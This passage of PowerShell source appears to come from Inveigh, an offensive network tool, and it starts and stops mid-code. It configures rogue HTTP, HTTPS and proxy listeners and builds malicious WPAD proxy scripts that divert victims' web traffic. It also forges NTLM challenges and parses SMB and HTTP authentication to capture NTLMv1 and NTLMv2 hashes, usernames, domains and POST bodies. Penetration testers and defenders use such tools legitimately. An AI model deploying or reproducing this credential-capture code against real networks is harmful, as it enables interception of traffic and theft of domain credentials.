$inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
}
else
{
if($HTTPSForceCertDelete -eq 'Y')
{
$inveigh.HTTPS_force_certificate_delete = $true
}
$inveigh.HTTPS_existing_certificate = $true
$inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
}
$inveigh.HTTPS = $true
if($HTTPIP -ne '0.0.0.0')
{
$inveigh.status_queue.Add("HTTPS IP = $HTTPIP") > $null
}
if($HTTPSPort -ne 443)
{
$inveigh.status_queue.Add("HTTPS Port = $HTTPSPort") > $null
}
$inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null
}
catch
{
$HTTPS = "N"
$inveigh.HTTPS = $false
$inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Error") > $null
}
}
}
else
{
$inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null
}
if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
$inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null
$inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
if($WPADAuth -like "NTLM*")
{
$WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
if($WPADAuthIgnore.Count -gt 0)
{
$inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
}
}
if($HTTPDir -and !$HTTPResponse)
{
$inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null
if($HTTPDefaultFile)
{
$inveigh.status_queue.Add("HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null
}
if($HTTPDefaultEXE)
{
$inveigh.status_queue.Add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null
}
}
if($HTTPResponse)
{
$inveigh.status_queue.Add("HTTP/HTTPS Response = Enabled") > $null
}
if($HTTPResponse -or $HTTPDir -and $HTTPContentType -ne 'html/text')
{
$inveigh.status_queue.Add("HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null
}
if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
{
$inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
}
$HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
if($HTTPResetDelay.Count -gt 0)
{
$inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
$inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
}
if($Proxy -eq 'Y')
{
if($proxy_port_check)
{
$Proxy = "N"
$inveigh.status_queue.Add("Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null
}
else
{
$inveigh.status_queue.Add("Proxy Capture = Enabled") > $null
$inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
$inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null
$ProxyPortFailover = $ProxyPort + 1
$ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
if($ProxyIgnore.Count -gt 0)
{
$inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
}
if($ProxyIP -eq '0.0.0.0')
{
$proxy_WPAD_IP = $IP
}
else
{
$proxy_WPAD_IP = $ProxyIP
}
if($WPADIP -and $WPADPort)
{
$WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}"
}
else
{
$WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}"
}
}
}
if($WPADDirectHosts)
{
ForEach($WPAD_direct_host in $WPADDirectHosts)
{
$WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
}
$inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
if($WPADResponse -and $Proxy -eq 'N')
{
$inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
}
elseif($WPADResponse -and $Proxy -eq 'Y')
{
$inveigh.status_queue.Add("WPAD Proxy Response = Enabled") > $null
if($WPADIP -and $WPADPort)
{
$inveigh.status_queue.Add("WPAD Failover = $WPADIP`:$WPADPort") > $null
}
}
elseif($WPADIP -and $WPADPort)
{
$inveigh.status_queue.Add("WPAD Response = Enabled") > $null
$inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null
if($WPADDirectHosts)
{
ForEach($WPAD_direct_host in $WPADDirectHosts)
{
$WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
}
$WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
$inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
}
else
{
$WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $WPADIP`:$WPADPort; DIRECT`";}"
}
}
elseif($WPADDirectFile -eq 'Y')
{
$inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null
$WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}"
}
if($Challenge)
{
$inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
}
}
if($MachineAccounts -eq 'N')
{
$inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
$inveigh.machine_accounts = $false
}
else
{
$inveigh.machine_accounts = $true
}
if($ConsoleOutput -ne 'N')
{
if($ConsoleOutput -eq 'Y')
{
$inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
}
else
{
$inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
}
$inveigh.console_output = $true
if($ConsoleStatus -eq 1)
{
$inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null
}
elseif($ConsoleStatus -gt 1)
{
$inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null
}
}
else
{
if($inveigh.tool -eq 1)
{
$inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
}
else
{
$inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
}
}
if($ConsoleUnique -eq 'Y')
{
$inveigh.console_unique = $true
}
else
{
$inveigh.console_unique = $false
}
if($FileOutput -eq 'Y')
{
$inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
$inveigh.status_queue.Add("Output Directory = $output_directory") > $null
$inveigh.file_output = $true
}
else
{
$inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
}
if($FileUnique -eq 'Y')
{
$inveigh.file_unique = $true
}
else
{
$inveigh.file_unique = $false
}
if($RunCount)
{
$inveigh.status_queue.Add("Run Count = $RunCount") > $null
}
if($RunTime -eq 1)
{
$inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
}
elseif($RunTime -gt 1)
{
$inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
}
if($ShowHelp -eq 'Y')
{
$inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null
if($inveigh.console_output)
{
$inveigh.status_queue.Add("Press any key to stop real time console output") > $null
}
}
if($inveigh.status_output)
{
while($inveigh.status_queue.Count -gt 0)
{
switch -Wildcard ($inveigh.status_queue[0])
{
{$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"}
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.status_queue[0] + $inveigh.newline)
}
else
{
Write-Warning($inveigh.status_queue[0])
}
$inveigh.status_queue.RemoveAt(0)
}
default
{
if($inveigh.output_stream_only)
{
Write-Output($inveigh.status_queue[0] + $inveigh.newline)
}
else
{
Write-Output($inveigh.status_queue[0])
}
$inveigh.status_queue.RemoveAt(0)
}
}
}
}
$shared_basic_functions_scriptblock =
{
function DataToUInt16($field)
{
[Array]::Reverse($field)
return [System.BitConverter]::ToUInt16($field,0)
}
function DataToUInt32($field)
{
[Array]::Reverse($field)
return [System.BitConverter]::ToUInt32($field,0)
}
function DataLength2
{
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
return $string_length
}
function DataLength4
{
param ([Int]$length_start,[Byte[]]$string_extract_data)
$string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
return $string_length
}
function DataToString
{
param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
$string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
$string_data = $string_data -replace "-00",""
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
return $string_extract
}
function ConvertFrom-PacketOrderedDictionary
{
param($packet_ordered_dictionary)
ForEach($field in $packet_ordered_dictionary.Values)
{
$byte_array += $field
}
return $byte_array
}
}
$SMB_NTLM_functions_scriptblock =
{
function SMBNTLMChallenge
{
param ([Byte[]]$payload_bytes)
$payload = [System.BitConverter]::ToString($payload_bytes)
$payload = $payload -replace "-",""
$NTLM_index = $payload.IndexOf("4E544C4D53535000")
if($NTLM_index -gt 0 -and $payload.SubString(($NTLM_index + 16),8) -eq "02000000")
{
$NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
}
return $NTLM_challenge
}
function SMBNTLMResponse
{
param ([Byte[]]$payload_bytes)
$payload = [System.BitConverter]::ToString($payload_bytes)
$payload = $payload -replace "-",""
$NTLMSSP_hex_offset = $payload.IndexOf("4E544C4D53535000")
if($NTLMSSP_hex_offset -gt 0 -and $payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000")
{
$NTLMSSP_offset = $NTLMSSP_hex_offset / 2
$LM_length = DataLength2 ($NTLMSSP_offset + 12) $payload_bytes
$LM_offset = DataLength4 ($NTLMSSP_offset + 16) $payload_bytes
$LM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $LM_offset)..($NTLMSSP_offset + $LM_offset + $LM_length - 1)]) -replace "-",""
$NTLM_length = DataLength2 ($NTLMSSP_offset + 20) $payload_bytes
$NTLM_offset = DataLength4 ($NTLMSSP_offset + 24) $payload_bytes
$NTLM_response = [System.BitConverter]::ToString($payload_bytes[($NTLMSSP_offset + $NTLM_offset)..($NTLMSSP_offset + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
$domain_length = DataLength2 ($NTLMSSP_offset + 28) $payload_bytes
$domain_offset = DataLength4 ($NTLMSSP_offset + 32) $payload_bytes
$NTLM_domain_string = DataToString ($NTLMSSP_offset + $domain_offset) $domain_length $payload_bytes
$user_length = DataLength2 ($NTLMSSP_offset + 36) $payload_bytes
$user_offset = DataLength4 ($NTLMSSP_offset + 40) $payload_bytes
$NTLM_user_string = DataToString ($NTLMSSP_offset + $user_offset) $user_length $payload_bytes
$host_length = DataLength2 ($NTLMSSP_offset + 44) $payload_bytes
$host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes
$NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes
if($NTLM_length -gt 24)
{
$NTLMv2_response = $NTLM_response.Insert(32,':')
$NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
}
$inveigh.NTLMv2_list.Add($NTLMv2_hash)
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash")
}
else
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)
$inveigh.console_queue.Add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
}
if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
{
$inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
}
if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
{
$inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
}
}
}
elseif($NTLM_length -eq 24)
{
$NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $LM_response + ":" + $NTLM_response + ":" + $NTLM_challenge
if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
{
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")
}
$inveigh.NTLMv1_list.Add($NTLMv1_hash)
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash")
}
else
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($NTLMv1_hash)
$inveigh.console_queue.Add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
}
if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
{
$inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
}
if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
{
$inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
}
}
}
}
}
}
$HTTP_scriptblock =
{
param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPResponse,
$HTTPS_listener,$NBNSBruteForcePause,$Proxy,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
param ([String]$Challenge,[Bool]$NTLMESS,[String]$ClientIPAddress,[Int]$ClientPort)
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
$HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
if($Challenge)
{
$HTTP_challenge = $Challenge
$HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
else
{
$HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
$HTTP_challenge = $HTTP_challenge_bytes -replace ' ', ''
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
$inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
if($NTLMESS)
{
$HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a
}
else
{
$HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a
}
$HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
0x00,0x00,0x00 +
$HTTP_NTLM_negotiation_flags +
$HTTP_challenge_bytes +
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
$HTTP_timestamp +
0x00,0x00,0x00,0x00,0x0a,0x0a
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = "NTLM " + $NTLM_challenge_base64
$NTLM_challenge = $HTTP_challenge
return $NTLM
}
if($HTTPS_listener)
{
$HTTP_type = "HTTPS"
}
elseif($proxy_listener)
{
$HTTP_type = "Proxy"
}
else
{
$HTTP_type = "HTTP"
}
if($HTTPIP -ne '0.0.0.0')
{
$HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
$HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
}
else
{
$HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
}
$HTTP_running = $true
$HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
$HTTP_client_close = $true
if($proxy_listener)
{
$HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0)
$HTTP_listener.Server.LingerState = $HTTP_linger
}
try
{
$HTTP_listener.Start()
}
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
$HTTP_running = $false
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
}
}
:HTTP_listener_loop while($inveigh.running -and $HTTP_running)
{
$TCP_request = ""
$TCP_request_bytes = New-Object System.Byte[] 4096
$HTTP_send = $true
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
$HTTP_header_cache_control = ""
$HTTP_header_authenticate = ""
$HTTP_header_authenticate_data = ""
$HTTP_message = ""
$HTTP_header_authorization = ""
$HTTP_header_host = ""
$HTTP_header_user_agent = ""
$HTTP_request_raw_URL = ""
$NTLM = "NTLM"
while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
{
Start-Sleep -m 10
if(!$inveigh.running)
{
break HTTP_listener_loop
}
}
if($HTTPS_listener)
{
if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.running)
{
$HTTP_client = $HTTP_listener.AcceptTcpClient()
$HTTP_clear_stream = $HTTP_client.GetStream()
$HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
$SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
$HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
}
[Byte[]]$SSL_request_bytes = $null
do
{
$HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
$SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
} while ($HTTP_clear_stream.DataAvailable)
$TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
}
else
{
if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.running)
{
$HTTP_client = $HTTP_listener.AcceptTcpClient()
$HTTP_stream = $HTTP_client.GetStream()
}
if($HTTP_stream.DataAvailable)
{
$HTTP_data_available = $true
}
else
{
$HTTP_data_available = $false
}
while($HTTP_stream.DataAvailable)
{
$HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
}
$TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
}
if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*" -or $TCP_request -like "50-4f-53-54*")
{
$HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
$HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
$HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
if($NBNSBruteForcePause)
{
$inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
$inveigh.hostname_spoof = $true
}
if($TCP_request -like "*-48-6F-73-74-3A-20-*")
{
$HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
$HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
$HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
}
if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
{
$HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
$HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
$HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
if($HTTPResetDelay.Count -gt 0 -and ($HTTPResetDelay | Where-Object {$HTTP_header_user_agent -match $_}))
{
$HTTP_reset_delay = $true
$HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
$HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
}
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
}
if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
}
}
}
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
$HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
$HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
$HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
}
if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
$HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
$HTTP_client_close = $true
}
else
{
if(($HTTP_request_raw_url -match '/wpad.dat' -and $WPADAuth -eq 'NTLM') -or ($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'NTLM'))
{
$HTTPNTLMESS = $true
}
else
{
$HTTPNTLMESS = $false
}
if($proxy_listener)
{
$HTTP_response_status_code = 0x34,0x30,0x37
$HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
else
{
$HTTP_response_status_code = 0x34,0x30,0x31
$HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
}
$HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
$HTTP_client_close = $false
}
if($TCP_request -like "50-4f-53-54*")
{
$HTTP_POST_request_extract = $TCP_request.Substring($TCP_request.IndexOf("-0D-0A-0D-0A-") + 12)
$HTTP_POST_request_extract = $HTTP_POST_request_extract.Substring(0,$HTTP_POST_request_extract.IndexOf("-00-"))
$HTTP_POST_request_extract = $HTTP_POST_request_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_POST_request = New-Object System.String ($HTTP_POST_request_extract,0,$HTTP_POST_request_extract.Length)
if($HTTP_POST_request_old -ne $HTTP_POST_request)
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request $HTTP_POST_request captured from $HTTP_source_IP")
$inveigh.POST_request_file_queue.Add($HTTP_POST_request)
$inveigh.POST_request_list.Add($HTTP_POST_request)
if($inveigh.file_output)
{
